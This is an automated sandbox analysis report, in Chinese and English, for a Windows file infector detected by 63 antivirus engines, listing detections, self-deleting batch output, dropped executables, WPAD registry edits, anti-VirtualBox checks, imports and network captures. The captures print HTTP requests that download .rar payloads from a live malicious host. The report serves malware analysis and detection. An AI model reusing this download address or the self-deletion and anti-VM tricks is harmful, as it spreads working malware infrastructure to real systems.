6.2
高危
63 个模型检测该样本为恶意!
重新分析
更多

a4d76ac4802ac60c244c1478b370bf564afab3914959cda8e69fbb10342f2852

cdd1c6c1f93fbaa618e330c4d41d98da.exe

分析耗时

30s

最近分析

文件大小

515.5KB
静态报毒 动态报毒 AI SCORE=85 BANLOAD CLASSIC CONFIDENCE CSTQAJ DARKSHELL DUMPMODULEINFECTIOUSNME FAMVT FILEINFECTOR HIGH CONFIDENCE INFECTED JADTRE KA@558NXG KUDJ LOADER M1R5 MALICIOUS PE MIKCER NIMNUL OTWYCAL PATCHLOAD PCARRIER R + W32 RAMNIT ROUE SCORE SMALL STATIC AI UNSAFE VJADTRE WALI WAPOMI 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
McAfee W32/Kudj 20201211 6.0.6.653
Alibaba Virus:Win32/Nimnul.379f46ac 20190527 0.3.0.5
CrowdStrike win/malicious_confidence_90% (W) 20190702 1.0
Baidu Win32.Virus.Otwycal.d 20190318 1.0.0.2
Avast Other:Malware-gen [Trj] 20201210 21.1.5827.0
Tencent Virus.Win32.Loader.aab 20201211 1.0.0.1
Kingsoft 20201211 2017.9.26.565
静态指标
Command line console output was observed (50 out of 674 个事件)
Time & API Arguments Status Return Repeated
1619910853.530372
WriteConsoleA
buffer: Usage:
console_handle: 0x0000000b
success 1 0
1619910853.530372
WriteConsoleA
buffer: DRview [-help] [-pid n] [-exe name] [-listdr] [-listall] [-listdlls] [-showdlls] [-nopid] [-no32] [-out file] [-cmdline] [-showmem] [-showtime] [-nobuildnum] [-qname strip] [-noqnames] [-hot_patch] [-s n] [-tillidle] [-idlecpu c] [-showmemfreq f] [-idleafter s] [-v]
console_handle: 0x0000000b
success 1 0
1619935750.662625
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619935750.662625
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619935750.662625
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\FTngrh.exe"
console_handle: 0x00000007
success 1 0
1619935750.725625
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\FTngrh.exe
console_handle: 0x00000007
success 1 0
1619935750.756625
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619935750.756625
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619935750.772625
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619935750.772625
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\FTngrh.exe"
console_handle: 0x00000007
success 1 0
1619935750.772625
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1619935750.772625
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
1619935750.803625
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619935750.803625
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619935750.803625
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\FTngrh.exe"
console_handle: 0x00000007
success 1 0
1619935750.819625
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\FTngrh.exe
console_handle: 0x00000007
success 1 0
1619935750.834625
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619935750.834625
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619935750.834625
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619935750.834625
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\FTngrh.exe"
console_handle: 0x00000007
success 1 0
1619935750.834625
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1619935750.834625
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
1619935750.850625
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619935750.850625
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619935750.850625
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\FTngrh.exe"
console_handle: 0x00000007
success 1 0
1619935750.865625
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\FTngrh.exe
console_handle: 0x00000007
success 1 0
1619935750.865625
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619935750.865625
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619935750.881625
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619935750.881625
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\FTngrh.exe"
console_handle: 0x00000007
success 1 0
1619935750.881625
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1619935750.881625
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
1619935750.881625
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619935750.881625
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619935750.881625
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\FTngrh.exe"
console_handle: 0x00000007
success 1 0
1619935750.897625
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\FTngrh.exe
console_handle: 0x00000007
success 1 0
1619935750.912625
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619935750.912625
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619935750.928625
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619935750.928625
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\FTngrh.exe"
console_handle: 0x00000007
success 1 0
1619935750.928625
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1619935750.928625
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
1619935750.944625
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619935750.944625
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619935750.959625
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\FTngrh.exe"
console_handle: 0x00000007
success 1 0
1619935750.990625
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\FTngrh.exe
console_handle: 0x00000007
success 1 0
1619935750.990625
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619935751.006625
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619935751.006625
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619935751.006625
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\FTngrh.exe"
console_handle: 0x00000007
success 1 0
This executable has a PDB path (1 个事件)
pdb_path D:\derek\dr\build_package\build_drmemory-release-32\dynamorio\bin32\DRview.pdb
Tries to locate where the browsers are installed (1 个事件)
file C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 个事件)
section )nE\xe0\xa3u4
行为判定
动态指标
Creates executable files on the filesystem (21 个事件)
file C:\Python27\Lib\distutils\command\wininst-6.0.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\02810883.exe
file C:\Python27\Lib\site-packages\setuptools\cli-32.exe
file C:\Python27\Lib\site-packages\pip\_vendor\distlib\w32.exe
file C:\Python27\Lib\site-packages\setuptools\cli.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\522601A9.exe
file C:\tmpsij43m\bin\inject-x86.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\74081757.exe
file C:\Python27\Lib\site-packages\setuptools\gui-32.exe
file C:\Python27\Lib\distutils\command\wininst-8.0.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\14A03C05.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\30436BFB.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\FTngrh.exe
file C:\Python27\Lib\distutils\command\wininst-7.1.exe
file C:\Python27\Lib\distutils\command\wininst-9.0.exe
file C:\tmpsij43m\bin\is32bit.exe
file C:\Python27\Lib\site-packages\setuptools\gui.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\5DCE3ECC.exe
file C:\tmpsij43m\bin\execsc.exe
file C:\Python27\Lib\site-packages\pip\_vendor\distlib\t32.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\24631e31.bat
Drops a binary and executes it (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\24631e31.bat
Drops an executable to the user AppData folder (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\FTngrh.exe
A process created a hidden window (1 个事件)
Time & API Arguments Status Return Repeated
1619935750.240125
ShellExecuteExW
parameters:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\24631e31.bat
filepath_r: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\24631e31.bat
show_type: 0
success 1 0
Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)
Time & API Arguments Status Return Repeated
1619935743.256125
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
The binary likely contains encrypted or compressed data indicative of a packer (1 个事件)
entropy 6.934363183371124 section {'size_of_data': '0x00004200', 'virtual_address': '0x00083000', 'entropy': 6.934363183371124, 'name': ')nE\\xe0\\xa3u4', 'virtual_size': '0x00005000'} description A section with a high entropy has been found
网络通信
Communicates with host for which no DNS query was performed (1 个事件)
host 172.217.24.14
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (15 个事件)
Time & API Arguments Status Return Repeated
1619935745.819125
RegSetValueExA
key_handle: 0x000003e4
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619935745.819125
RegSetValueExA
key_handle: 0x000003e4
value: °&E’ä>×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619935745.819125
RegSetValueExA
key_handle: 0x000003e4
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619935745.819125
RegSetValueExW
key_handle: 0x000003e4
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619935745.819125
RegSetValueExA
key_handle: 0x000003f4
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619935745.819125
RegSetValueExA
key_handle: 0x000003f4
value: °&E’ä>×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619935745.834125
RegSetValueExA
key_handle: 0x000003f4
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1619935745.881125
RegSetValueExW
key_handle: 0x000003ec
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
1619935746.537125
RegSetValueExA
key_handle: 0x00000404
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619935746.537125
RegSetValueExA
key_handle: 0x00000404
value: µ²’ä>×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619935746.537125
RegSetValueExA
key_handle: 0x00000404
value: 0
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619935746.537125
RegSetValueExW
key_handle: 0x00000404
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619935746.537125
RegSetValueExA
key_handle: 0x00000408
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619935746.537125
RegSetValueExA
key_handle: 0x00000408
value: µ²’ä>×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619935746.537125
RegSetValueExA
key_handle: 0x00000408
value: 0
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
Detects VirtualBox through the presence of a file (5 个事件)
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxControl.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxTray.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxDrvInst.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxWHQLFake.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\uninst.exe
File has been identified by 63 AntiVirus engines on VirusTotal as malicious (50 out of 63 个事件)
Bkav W32.FamVT.DumpModuleInfectiousNME.PE
Elastic malicious (high confidence)
MicroWorld-eScan Win32.VJadtre.3
FireEye Generic.mg.cdd1c6c1f93fbaa6
McAfee W32/Kudj
Cylance Unsafe
Zillya Virus.Nimnul.Win32.5
Sangfor Malware
K7AntiVirus Virus ( 0040f7441 )
Alibaba Virus:Win32/Nimnul.379f46ac
K7GW Virus ( 0040f7441 )
CrowdStrike win/malicious_confidence_90% (W)
Arcabit Win32.VJadtre.3
Baidu Win32.Virus.Otwycal.d
Cyren W32/PatchLoad.E
Symantec W32.Wapomi.C!inf
TotalDefense Win32/Nimnul.A
APEX Malicious
Paloalto generic.ml
ClamAV Win.Trojan.Downloader-64720
Kaspersky Virus.Win32.Nimnul.f
BitDefender Win32.VJadtre.3
NANO-Antivirus Trojan.Win32.Banload.cstqaj
AegisLab Virus.Win32.Nimnul.m1R5
Avast Other:Malware-gen [Trj]
Tencent Virus.Win32.Loader.aab
Ad-Aware Win32.VJadtre.3
TACHYON Virus/W32.Ramnit.C
Sophos Mal/Generic-R + W32/Nimnul-A
Comodo Virus.Win32.Wali.KA@558nxg
F-Secure Malware.W32/Jadtre.B
DrWeb BackDoor.Darkshell.246
VIPRE Virus.Win32.Small.acea (v)
TrendMicro PE_WAPOMI.BM
McAfee-GW-Edition BehavesLike.Win32.Infected.hm
Emsisoft Win32.VJadtre.3 (B)
SentinelOne Static AI - Malicious PE
Jiangmin Win32/Nimnul.f
Avira W32/Jadtre.B
Antiy-AVL Virus/Win32.Nimnul.f
Gridinsoft Trojan.Heur!.03002201
Microsoft Virus:Win32/Mikcer.B
ViRobot Win32.Ramnit.F
ZoneAlarm Virus.Win32.Nimnul.f
GData Win32.Virus.Wapomi.A
Cynet Malicious (score: 100)
AhnLab-V3 Win32/VJadtre.Gen
BitDefenderTheta AI:FileInfector.991137D00F
ALYac Win32.VJadtre.3
MAX malware (ai score=85)
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2016-08-29 15:12:06

Imports

Library ADVAPI32.dll:
0x47c354 OpenProcessToken
0x47c358 OpenThreadToken
0x47c368 RegDeleteKeyW
0x47c36c RegCloseKey
0x47c370 RegCreateKeyExW
0x47c374 FreeSid
0x47c378 SetEntriesInAclW
0x47c380 LookupAccountNameW
0x47c384 AddAccessAllowedAce
0x47c388 InitializeAcl
0x47c38c GetLengthSid
0x47c390 RegSetKeySecurity
0x47c3a4 RegOpenKeyExW
0x47c3a8 GetSecurityInfo
0x47c3ac RegEnumKeyExW
0x47c3b0 RegEnumValueW
0x47c3b4 RegDeleteValueW
0x47c3b8 RegQueryValueExW
0x47c3bc RegSetValueExW
0x47c3c0 RegOpenKeyW
0x47c3c4 CloseEventLog
0x47c3c8 ReadEventLogW
0x47c3d8 OpenEventLogW
0x47c3dc ClearEventLogW
Library KERNEL32.dll:
0x47c428 GetProcAddress
0x47c42c GetModuleHandleW
0x47c430 Sleep
0x47c434 GetLastError
0x47c438 ReadProcessMemory
0x47c43c CloseHandle
0x47c440 OpenProcess
0x47c444 TerminateProcess
0x47c448 SleepEx
0x47c44c GetCurrentProcess
0x47c450 GetCurrentThread
0x47c454 FindClose
0x47c458 FindFirstFileW
0x47c45c MoveFileExW
0x47c460 MoveFileW
0x47c464 DeleteFileW
0x47c468 LocalFree
0x47c46c GetShortPathNameW
0x47c470 GetSystemDirectoryW
0x47c474 CreateDirectoryW
0x47c478 RemoveDirectoryW
0x47c47c FindNextFileW
0x47c480 LocalAlloc
0x47c484 GetExitCodeProcess
0x47c488 WaitForSingleObject
0x47c48c CreateProcessW
0x47c490 CopyFileW
0x47c494 ResumeThread
0x47c498 GetThreadContext
0x47c49c CreateThread
0x47c4a0 VirtualFreeEx
0x47c4a4 WriteProcessMemory
0x47c4a8 VirtualProtectEx
0x47c4ac VirtualAllocEx
0x47c4b0 CreateRemoteThread
0x47c4b4 CreateFileW
0x47c4bc FormatMessageW
0x47c4c0 LoadLibraryExW
0x47c4c4 CreateEventW
0x47c4c8 GetCurrentProcessId
0x47c4cc HeapFree
0x47c4d0 HeapAlloc
0x47c4d4 GetProcessHeap
0x47c4d8 WriteConsoleW
0x47c4dc GetFileType
0x47c4e0 GetStdHandle
0x47c4e4 GetModuleFileNameW
0x47c4e8 ExitProcess
0x47c4ec DecodePointer
0x47c4f8 GetCommandLineA
0x47c4fc HeapSetInformation
0x47c500 GetStringTypeW
0x47c504 MultiByteToWideChar
0x47c508 ReadFile
0x47c514 IsDebuggerPresent
0x47c518 EncodePointer
0x47c520 LoadLibraryW
0x47c52c FatalAppExitA
0x47c530 FreeLibrary
0x47c534 InterlockedExchange
0x47c538 GetLocaleInfoW
0x47c53c TlsAlloc
0x47c540 TlsGetValue
0x47c544 TlsSetValue
0x47c548 TlsFree
0x47c550 SetLastError
0x47c554 GetCurrentThreadId
0x47c55c WriteFile
0x47c560 SetHandleCount
0x47c564 GetStartupInfoW
0x47c568 WideCharToMultiByte
0x47c56c GetConsoleCP
0x47c570 GetConsoleMode
0x47c574 FlushFileBuffers
0x47c578 RtlUnwind
0x47c57c GetModuleFileNameA
0x47c588 HeapCreate
0x47c58c HeapDestroy
0x47c594 GetTickCount
0x47c5a0 GetCPInfo
0x47c5a4 GetACP
0x47c5a8 GetOEMCP
0x47c5ac IsValidCodePage
0x47c5b0 LCMapStringW
0x47c5b4 SetStdHandle
0x47c5b8 SetFilePointer
0x47c5bc SetEndOfFile
0x47c5c0 HeapSize
0x47c5c4 HeapReAlloc
0x47c5c8 CreateFileA
0x47c5cc GetUserDefaultLCID
0x47c5d0 GetLocaleInfoA
0x47c5d4 EnumSystemLocalesA
0x47c5d8 IsValidLocale

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49179 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49180 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49181 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49182 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49183 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49184 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49185 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49186 63.251.106.25 ddos.dnsnb8.net 799

UDP

Source Source Port Destination Destination Port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 51378 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 58367 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 53657 224.0.0.252 5355
192.168.56.101 55368 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 56540 239.255.255.250 3702
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58368 239.255.255.250 3702
192.168.56.101 58371 239.255.255.250 3702
192.168.56.101 58707 239.255.255.250 3702

HTTP & HTTPS Requests

URI Data
http://ddos.dnsnb8.net:799/cj//k1.rar 
GET /cj//k1.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
http://ddos.dnsnb8.net:799/cj//k3.rar 
GET /cj//k3.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
http://ddos.dnsnb8.net:799/cj//k2.rar 
GET /cj//k2.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
http://ddos.dnsnb8.net:799/cj//k5.rar 
GET /cj//k5.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
http://ddos.dnsnb8.net:799/cj//k4.rar 
GET /cj//k4.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.